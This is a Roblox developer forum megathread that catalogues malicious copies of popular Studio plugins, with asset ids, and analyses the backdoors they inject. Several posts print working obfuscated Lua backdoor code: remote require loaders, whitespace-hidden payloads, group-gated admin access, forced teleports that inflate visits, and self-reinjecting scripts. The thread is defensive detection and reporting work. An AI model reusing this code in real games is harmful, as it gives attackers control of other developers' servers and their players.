Known Malicious Plugins for HISR detection Megathread

Just as an FYI, these have all been sent to moderation to be deleted.

59 Likes

Malicious plugin: 2760053108
Original plugin: 637905041

3 Likes

I am still confused as to why the users creating these backdoors get their accounts deleted, but the actual malicious assets remain. Everything should be gone. Additionally, I feel like IP bans and machine bans would be a more viable solution then just deleting the account because spoofing the machine hardware ID is much more time consuming and we all know these backdoors are coming from a select few exploit developers that are trying to sell products with “server sided script execution”, after FE was mandated.

7 Likes

Malicious plugin: 2787024683
Original: 171505690

Module being required: 2674688515

Who needs to deobsfucate when you can just change the environment
getfenv()["require"] = function(...) warn(...) end

5 Likes

Malicious plugin: 2787024663
Original: 519874479

Requires same module: 2674688515

3 Likes

Said module 2655056793 requires another module. 2686631266 (wow thanks roblox for indirectly helping by telling me that you are removing private modules required from others)


Ro-Defender™ Plugin v8.7

Malicious: 2655565054
Original: 142273772

1 Like

AeroGameFramework

Original: 1882232354
Malicious: 2435556035

1 Like

Just an FYI for everybody concerned about malicious plugins. I’ve seen a massive uptake in spam user accounts purposefully impersonating well known developers. For example:

  • Real: OkevinO Spam: 0kevin0
  • Real: CodeSponge Spam: SpongeCoder

I think a lot of these accounts got banned, but I just wanted to make people aware because one of my friends fell for this and got into trouble with the moderators because of a server side backdoor being used to put items in his game.

Please double check the names of who developed the plugin you’re installing and check if it’s a deliberate copy or not.

6 Likes

It’s happening again.

Part to Terrain (my own plugin.)
Original: 261634767
Malicious: 3328292627

Building Tools by F3X
Original: 144950355
Malicious: 3320045603

GapFill & Extrude
Original: 165687726
Malicious: 3320031385

Load Character
Original: 752585459
Malicious: 3323713717

Waterfall Generator
Original: 1191990117
Malicious: 3328279741

3 Likes

Tree Generator
Original: 1256428022
Malicious: 3390238326

Pretty half-baked attempt if I’m honest, the injected code broke my server core script which in turn breaks everything else. Good way to draw the ire of a coffee-deprived developer. 0/10.

Intro Creator

Original plugin: https://www.roblox.com/library/723917710/Intro-Creator-OFFICIAL
Malicious plugin: https://www.roblox.com/library/3664187642/Intro-Creator

Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)

Roundify
Original: 2233768483
Malicious: 3745147634

Intro Creator
Original: 723917710
Malicious: 3664187642

Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332

Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463

Roundify

Malicious plugin: 4593270188
Original plugin: 2233768483

1 Like

This is awesome. Much faster than self-verification and an easy way of getting what you need.

Thanks for creating the tool!

1 Like

Virus-Destroyer (Anti-Serverside)

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:

pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Custom Name Title

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:

a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Fall Damage Plugin [FIXED]

Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED

~~
~~

1

Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
–Official roblox studio script
require(4582121027):protecc()
]]

Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic

~~
~~

2

Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService(“TeleportService”)
if joinData == 4628266409 then
local Tpdata = player:GetJoinData().TeleportData
if Tpdata then
Req = Tpdata.req
gid = Tpdata.grid
end
if player:GetRankInGroup(gid) == 2 then
require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)
local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4628266409, player, teleportData)
end)

]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.

~~
~~

3

Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:

a(b)function c(d)d.Source=d.Source…’\n’…game:GetObjects(‘rbxassetid://4850318089’)[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,‘Script’)and not string.find(d.Source,‘4794986906’)then c(d)d:GetPropertyChangedSignal(‘Source’):Connect(function()if not string.find(d.Source,‘4794986906’)then c(d)end end)end end;f=false;function g()d=game:GetObjects(‘rbxassetid://4852273118’)[1]if not b:FindFirstChild(‘Filter Event’)or b:FindFirstChild(‘Filter Event’).Source~=d.Source then d.Parent=b else d=b:FindFirstChild(‘Filter Event’)end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal(‘Parent’):Connect(h)d.Changed:Connect(function(j)if rawequal(j,‘Disabled’)or rawequal(j,‘Source’)then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService(‘ServerScriptService’))

There are multiple require-id’s in this action attempt. All require ids listed.

Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:

–[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn’t modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
– You may proceed if you have basic knowledge of scripting and know what you’re doing.
local RunService = game:GetService(“RunService”)
local Require = require
local Loader = 4794986906 – Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then – Checks if it isn’t Studio, as it defeats the purpose of the module, also checks if it is being ran on the server’s side and not on the client’s side, just to be on the safe side.
pcall(Require, Loader) – Begins to load the module, it is wrapped in pcall so it doesn’t bother you in anyway whatsoever.
end

Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as orbfuscated.

Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:

if not game:service’RunService’:IsStudio() then getfenv()"\114\101\113\117\105\114\101" end

Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id

~~
~~

5

Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:

pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source=’–[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is apart of above malicious plugins

2 Likes

Backdoor malicious module

getfenv()['\114\101\113\117\105\114\101'](2422875198*2)

2422875198*2 = 4845750396

is orbfuscated but by running in repl.it, prints module id that failed to load.
which it then loads

which has a script to then load

Roblox = "IsStudio"																																																																																																																																																																																																																		
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end 

and

--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {} 
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
	CheckMeIn = "Loaded."
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										local a = script.Script
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														a.Parent = workspace.Camera
end
  
return module

Module 862849844 is referred to CheckMeIn which is unknown to be the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module, they’ve been warned for over 3 days before I posted this.

The top script then finally loads this module.

This module has a lot of obfuscated code, but one of the scripts remained un obfuscated, loading these two other modules.

MainModule> Folder> Main> ul

-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(6157358) >= 2 then
		wait(0.1)
        require(4674979018):Fire(Player.Name) 
		require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
    end
end)
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(5860863) >= 2 then
		wait(0.1)
        require(4834950415):Fire(Player.Name)
		require(5033070911):ikthisisskidded(Player.Name)
    end
end)
game:GetService("Players").PlayerAdded:Connect(
    function(player)
        if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
            game:GetService("TeleportService"):Teleport(5009641755, player)
        end
    end
)

Many of the modules uses these groups to check if player is a member of before giving members scripts in this backdoor.

Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’

One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.

Loads another module

and another module

This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle

another module

This backdoor is still loaded by an unknown plugin, still looking for it.

3 Likes

Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.

Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end		

This has to be a “virus”, delete those.

Another way to detect those is by Searching “game:service”, INCASE you haven’t used “game:service” in your script.

I do not know what malicious plugin my friend has installed

3 Likes